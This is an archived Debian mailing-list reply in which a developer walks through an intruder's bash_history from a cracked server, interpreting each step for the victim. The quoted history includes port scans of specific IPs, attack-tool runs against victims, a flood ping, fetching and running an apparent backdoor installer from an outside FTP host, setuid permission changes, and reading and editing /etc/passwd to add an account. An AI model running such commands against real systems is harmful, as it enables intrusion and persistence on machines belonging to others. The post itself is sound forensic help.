Re: bash_history from Cracked Computer

To: "Dzuy M. Nguyen" <dzuy@pacificdentalcare.com>
Cc: debian-user@lists.debian.org
Subject: Re: bash_history from Cracked Computer
From: Joey Hess <joeyh@debian.org>
Date: Tue, 2 May 2000 19:06:58 -0700
Message-id: <[🔎] 20000502190658.I4189@kitenet.net>
Mail-followup-to: "Dzuy M. Nguyen" <dzuy@pacificdentalcare.com>, debian-user@lists.debian.org
In-reply-to: <[🔎] 015201bfb48f$1ff77fa0$e2e4cbd1@dociss>; from dzuy@pacificdentalcare.com on Tue, May 02, 2000 at 04:35:37PM -0700
References: <[🔎] 015201bfb48f$1ff77fa0$e2e4cbd1@dociss>

Dzuy M. Nguyen wrote:
> Can someone help me figure out this "/.bash_history" from my
> computer that someone cracked into and did some damage.
> 
> I'll probably re-install the box, but I'd like to see what they did
> before I destroy it.  I've attached the "/.bash_history".

Let's cut it down some..

> cc anatomy.c -o anatomy
> cc kod.c -o kofd
> cp kofd kod
> rm kofd

According to google, kod and kofd are related to the oracle database.
It's possible this is a cooincidence, or he was using these names to try
to appear innocous (weird choices though; 'sh' is better..)

It's odd he made them and immediatly deleted them -- unless he was
logged in twice and went and used them in between.

> ./anatomy 216.209.196.154 22
> ./anatomy 216.209.205.68 22
> ./anatomy 216.209.207.150 22

I'd guess anatomy is some kind of port scanner. 22 is the ssh port.

> tar -zxvf bnc2_6_4_tar.gz
> cd bnc2.6.4
> ./configure
> make
> make install

bnc2 is a irc proxy server. Home page is http://bnc.dragondata.com/, a
file by the same name as what he untarred is at
http://bnc.dragondata.com/

> cd small
> mkdir .shit
> cd .shit
> chmod 777 *
> chmod +s *
> chmod 666 *
> chmod 777 *

I'd assume he is ftping or scping or something files onto your box,
since files seem to have just appeared here. Probably ftp, since the
permissions had to be fixed up. Might be useful to see if anything
shows up in the logs for daemons that can transfer files.

> ./pscan
> ./b
> ./pscan 167.64 111

Presumably a port scanner that operates on whole networks. Port 111 is
the run rpc port, so he's probably interested in nfs exploits or related
thing here.

> ./pscan 195.54 111
> cat wuftp.log
> ./b 195.54.3.134
> ./b 195.54.29.7
> ./b 195.54.221.21

It looks like 'b' is his mode of attack after he portscans and finds new
victims.

> ping -f newsforlinux.com

A little malicious flood pinging always brightens up the day..

> ftp columbia.digiweb.com
> tar -zxvf linux.tar.gz
> cd .bd
> ./install

Hm. Since columbia.digiweb.com has no open ftp server, or kernel mirror
that I can see, I doubt this is really the kernel.

> cat /etc/passwd
> pico /ec/passwd
> cat .bash_history
> passwd z
> cat /etc/passwd

Adds a user, be sure to delete that user immediatly... Of course, you
probably want to back up the system and reinstall from scratch.

-- 
see shy jo

Reply to:

Follow-Ups:
- Re: bash_history from Cracked Computer
  - From: w trillich <will@pinncomp.net>

References:
- bash_history from Cracked Computer
  - From: "Dzuy M. Nguyen" <dzuy@pacificdentalcare.com>

Prev by Date: Help with apachie
Next by Date: Re: help outlook /outlook express
Previous by thread: Re: bash_history from Cracked Computer
Next by thread: Re: bash_history from Cracked Computer
Index(es):
- Date
- Thread